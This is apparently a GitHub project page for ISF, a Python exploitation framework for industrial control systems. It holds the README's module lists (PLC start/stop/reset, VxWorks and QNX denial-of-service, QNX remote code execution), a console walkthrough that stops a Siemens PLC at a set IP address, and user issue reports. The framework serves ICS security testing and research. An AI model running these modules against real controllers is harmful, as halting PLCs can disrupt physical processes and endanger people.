dark-lbp / isf Goto Github PK

ISF(Industrial Control System Exploitation Framework)，a exploitation framework based on Python

License: BSD 2-Clause "Simplified" License

Python 100.00%

ics ics-exp ics-poc scapy isf modbus exploits scada plc

isf's Introduction

Industrial Exploitation Framework

ISF(Industrial Exploitation Framework) is a exploitation framework based on Python, it's similar to metasploit framework.

ISF is based on open source project routersploit.

Read this in other languages: English, 简体中文,

Disclaimer

Usage of ISF for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.

ICS Protocol Clients

Name	Path	Description
modbus_tcp_client	icssploit/clients/modbus_tcp_client.py	Modbus-TCP Client
wdb2_client	icssploit/clients/wdb2_client.py	WdbRPC Version 2 Client(Vxworks 6.x)
s7_client	icssploit/clients/s7_client.py	s7comm Client(S7 300/400 PLC)

Exploit Module

Name	Path	Description
s7_300_400_plc_control	exploits/plcs/siemens/s7_300_400_plc_control.py	S7-300/400 PLC start/stop
s7_1200_plc_control	exploits/plcs/siemens/s7_1200_plc_control.py	S7-1200 PLC start/stop/reset
vxworks_rpc_dos	exploits/plcs/vxworks/vxworks_rpc_dos.py	Vxworks RPC remote dos（CVE-2015-7599）
quantum_140_plc_control	exploits/plcs/schneider/quantum_140_plc_control.py	Schneider Quantum 140 series PLC start/stop
crash_qnx_inetd_tcp_service	exploits/plcs/qnx/crash_qnx_inetd_tcp_service.py	QNX Inetd TCP service dos
qconn_remote_exec	exploits/plcs/qnx/qconn_remote_exec.py	QNX qconn remote code execution
profinet_set_ip	exploits/plcs/siemens/profinet_set_ip.py	Profinet DCP device IP config

Scanner Module

Name	Path	Description
profinet_dcp_scan	scanners/profinet_dcp_scan.py	Profinet DCP scanner
vxworks_6_scan	scanners/vxworks_6_scan.py	Vxworks 6.x scanner
s7comm_scan	scanners/s7comm_scan.py	S7comm scanner
enip_scan	scanners/enip_scan.py	EthernetIP scanner

ICS Protocols Module (Scapy Module)

These protocol can used in other Fuzzing framework like Kitty or create your own client.

Name	Path	Description
pn_dcp	icssploit/protocols/pn_dcp	Profinet DCP Protocol
modbus_tcp	icssploit/protocols/modbus_tcp	Modbus TCP Protocol
wdbrpc2	icssploit/protocols/wdbrpc2	WDB RPC Version 2 Protocol
s7comm	icssploit/protocols/s7comm.py	S7comm Protocol

Install

Python requirements

gnureadline (OSX only)
requests
paramiko
beautifulsoup4
pysnmp
python-nmap
scapy We suggest install scapy manual with this official document

Install on Kali

git clone https://github.com/dark-lbp/isf/
cd isf
python isf.py

Usage

    root@kali:~/Desktop/temp/isf# python isf.py
    
      _____ _____  _____ _____ _____  _      ____ _____ _______
     |_   _/ ____|/ ____/ ____|  __ \| |    / __ \_   _|__   __|
       | || |    | (___| (___ | |__) | |   | |  | || |    | |
       | || |     \___ \\___ \|  ___/| |   | |  | || |    | |
      _| || |____ ____) |___) | |    | |___| |__| || |_   | |
     |_____\_____|_____/_____/|_|    |______\____/_____|  |_|
    
    
                    ICS Exploitation Framework
    
    Note     : ICSSPOLIT is fork from routersploit at
               https://github.com/reverse-shell/routersploit
    Dev Team : wenzhe zhu(dark-lbp)
    Version  : 0.1.0
    
    Exploits: 2 Scanners: 0 Creds: 13
    
    ICS Exploits:
        PLC: 2          ICS Switch: 0
        Software: 0
    
    isf >

Exploits

isf > use exploits/plcs/
exploits/plcs/siemens/  exploits/plcs/vxworks/
isf > use exploits/plcs/siemens/s7_300_400_plc_control
exploits/plcs/siemens/s7_300_400_plc_control
isf > use exploits/plcs/siemens/s7_300_400_plc_control
isf (S7-300/400 PLC Control) >

You can use the tab key for completion.

Options

Display module options:

isf (S7-300/400 PLC Control) > show options

Target options:

   Name       Current settings     Description
   ----       ----------------     -----------
   target                          Target address e.g. 192.168.1.1
   port       102                  Target Port


Module options:

   Name        Current settings     Description
   ----        ----------------     -----------
   slot        2                    CPU slot number.
   command     1                    Command 0:start plc, 1:stop plc.


isf (S7-300/400 PLC Control) >

Set options

isf (S7-300/400 PLC Control) > set target 192.168.70.210
[+] {'target': '192.168.70.210'}

Run module

isf (S7-300/400 PLC Control) > run
[*] Running module...
[+] Target is alive
[*] Sending packet to target
[*] Stop plc
isf (S7-300/400 PLC Control) >

Display information about exploit

isf (S7-300/400 PLC Control) > show info

Name:
S7-300/400 PLC Control

Description:
Use S7comm command to start/stop plc.

Devices:
-  Siemens S7-300 and S7-400 programmable logic controllers (PLCs)

Authors:
-  wenzhe zhu <jtrkid[at]gmail.com>

References:

isf (S7-300/400 PLC Control) >

Documents

isf's People

Contributors

Stargazers

Watchers

Forkers

xuxiaochuan cys3c thurday awesome-security xcatcat xiaoyanguoke idkwim thiagosimonin chansimdeng s4yhell0 5up3rc chubbymaggie fsxchen kalafinaglll droral87 aravindkpv atimorin demirelcan lucyoa ver007 pandazheng moss1993 garrettsocling xuchenbupt alertisme lordlight young9471 adolfoeliazat fishtian ellerbrock wangdandanqq minkione cainiaoxiaobai2016 hackzx soikjk nimdakey qsdj b-xiang zldww2011 celestial-intelligence gowabby zmiaomiao subzeroking r3dfruitrollup dg60 mccha 615 matis006 pythonone quanpower masonqaq jorson-chen kutlaykocer ccgcyber mdudek-ics lsh4ck gao6120244 strfkr gr3yr0n1n shalekesan riviera12345 nea-yan unix1010 fengyinyang fuckup1337 shellsec ith4cker hjzmc 111cyber0cculte888 anthem9 waterdemo airaiwei miracle963 balaasif6789 ro9ueadmin pagaal58 vu-lab c4nnibal imertayak fr830 lonehand alberthchang icepaule rdsece tr33-he11 chixxx sn0wdown ryanmjones suifeng227 farhannysf attackgithub zishan11 n8v79a domingolaz superf0sh shangadi gitcontainer ics-security sry309 marciopocebon

isf's Issues

Port this to python3

I hate to be that guy, but python2 EOL'd back in april.

That was after it originally EOL'd in January.

That was after it was originally planned to EOL in 2015.

That was after python3 was released in 2006.

This was a very very very long time coming and there was numerous warnings.

I just saw this mentioned in a talk in August 2020 in the blackhat briefings.

Using an unsupported interpreter is a massive security issue and the irony is dully noted.

S7-1200 module - error: [Errno 104] Connection reset by peer

Testing the S7-1200 PLC Control module against a real S7-1200 (1212C), when sending the stop command, get:

isf (S7-1200 PLC Control) > set target 192.168.1.190
[+] {'target': '192.168.1.190'}
isf (S7-1200 PLC Control) > set command 2
[+] {'command': '2'}
isf (S7-1200 PLC Control) > run
[*] Running module...
[+] Target is alive
[*] Sending packet to target
[*] reset plc
[-] Traceback (most recent call last):
  File "/root/isf/icssploit/interpreter.py", line 337, in command_run
    self.current_module.run()
  File "/root/isf/icssploit/modules/exploits/plcs/siemens/s7_1200_plc_control.py", line 122, in run
    self.exploit()
  File "/root/isf/icssploit/modules/exploits/plcs/siemens/s7_1200_plc_control.py", line 107, in exploit
    self.start_ctrl(stop_cpu_packet)
  File "/root/isf/icssploit/modules/exploits/plcs/siemens/s7_1200_plc_control.py", line 95, in start_ctrl
    s.recv(1024)
error: [Errno 104] Connection reset by peer

vxworks_6_X_scan dose'nt work fine

when I try to learn the source code. I find "checksum()" in ./icssploit/protocol/wdbrpc2.py undefined. Where can I import the package.
Please Help me, thanks!

Create release

For packing isf for distribution it would easier if there are source tarballs available. Can you please create one? Thanks,

'type' object is not iterable

I am trying to run it, but I get this:

python isf.py
Traceback (most recent call last):
File "isf.py", line 9, in
from icssploit.interpreter import IcssploitInterpreter
File "/root/isf/icssploit/init.py", line 1, in
from icssploit.utils import (
File "/root/isf/icssploit/utils/init.py", line 21, in
import requests
File "/usr/lib/python2.7/dist-packages/requests/init.py", line 84, in
from urllib3.contrib import pyopenssl
File "/usr/lib/python2.7/dist-packages/urllib3/contrib/pyopenssl.py", line 46, in
import OpenSSL.SSL
File "/usr/lib/python2.7/dist-packages/OpenSSL/init.py", line 8, in
from OpenSSL import crypto, SSL
File "/usr/lib/python2.7/dist-packages/OpenSSL/crypto.py", line 12, in
from cryptography import x509
File "/usr/lib/python2.7/dist-packages/cryptography/x509/init.py", line 8, in
from cryptography.x509.base import (
File "/usr/lib/python2.7/dist-packages/cryptography/x509/base.py", line 16, in
from cryptography.x509.extensions import Extension, ExtensionType
File "/usr/lib/python2.7/dist-packages/cryptography/x509/extensions.py", line 24, in
from cryptography.x509.general_name import GeneralName, IPAddress, OtherName
File "/usr/lib/python2.7/dist-packages/cryptography/x509/general_name.py", line 18, in
from cryptography.x509.name import Name
File "/usr/lib/python2.7/dist-packages/cryptography/x509/name.py", line 28, in
_ASN1_TYPE_TO_ENUM = dict((i.value, i) for i in _ASN1Type)
TypeError: 'type' object is not iterable

no module nmap

Traceback (most recent call last):
File "isf.py", line 9, in
from icssploit.interpreter import IcssploitInterpreter
File "/root/Desktop/isf/icssploit/init.py", line 1, in
from icssploit.utils import (
File "/root/Desktop/isf/icssploit/utils/init.py", line 15, in
import nmap
ImportError: No module named nmap

Error: No module named nmap

There are some issues with scanner module：No module named nmap

isf > use scanners/vxworks_6_scan
[-] Error during loading 'icssploit/modules/scanners/vxworks_6_scan'
Error: No module named nmap
It should be valid path to the module. Use key multiple times for completion.

After run scan

nm = nmap.PortScanner()

AttributeError: 'module' object has no attribute 'PortScanner'

mac os run isf???

/dev/fd/12:18: command not found: compdef
chikkachun@chikdeMBP ~ % git clone https://github.com/dark-lbp/isf/
cd isf
python isf.py
fatal: destination path 'isf' already exists and is not an empty directory.
zsh: command not found: python
chikkachun@chikdeMBP isf % ls
README-ZH.md docs lib
README.md ics.cnvd logs
core isf.gif module
dependencies isf.py requirements.txt
docker isf.xml
chikkachun@chikdeMBP isf % isf.py
zsh: command not found: isf.py
chikkachun@chikdeMBP isf %